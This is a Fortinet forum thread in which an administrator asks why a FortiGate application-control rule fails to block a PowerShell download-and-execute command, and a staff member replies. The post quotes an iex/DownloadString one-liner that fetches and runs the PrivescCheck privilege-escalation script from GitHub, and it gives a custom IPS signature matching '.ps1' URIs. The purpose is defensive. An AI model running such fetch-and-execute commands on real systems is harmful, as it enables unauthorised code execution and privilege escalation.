Support Forum
The Forums are a place to find answers on a range of Fortinet products from peers and product experts.
AUT_Maverick
New Contributor

fortigate block powershell

Hello Guys,

I have a simple Question how can i block Windows Powershell commands like this:

I created a Firewall Policy where Source is my Test Client and moved Policy before Rule #1 and activated DPI + Application Control + selected Windows.Powershell Action block in the Application Control Profile. What did i do wrong? When i visit the website "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1" manually with the browser I see that i have the fortigate ssl cert instead of the github one.

Also in FortiAnalyzer the log tells me that traffic to raw.githubusercontent.com goes via my newly created policy. Under Application in the log there is only the application HTTP.BROWSER but not Powershell.

iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1');Invoke-PrivescCheck -Extended -Report PrivescCheck -Format TXT,HTML

 

Edited1: I found a workaround for the ps1 file. I created a custom IPS Signature which scans uri for .ps1 like this:

F-SBID( --revision 1; --attack_id 8614; --name "BlockPS1"; --service HTTP; --protocol tcp; --pattern ".ps1"; --context uri; --no_case; --flow from_client;)

HUVA
1 REPLY 1
abarushka
Staff
Staff

Hello,

 

I suspect that you get FortiGate deep inspection default certificate, since the traffic was blocked by FortiGate and replacement message was generated using FortiGate deep inspection default certificate.

FortiGate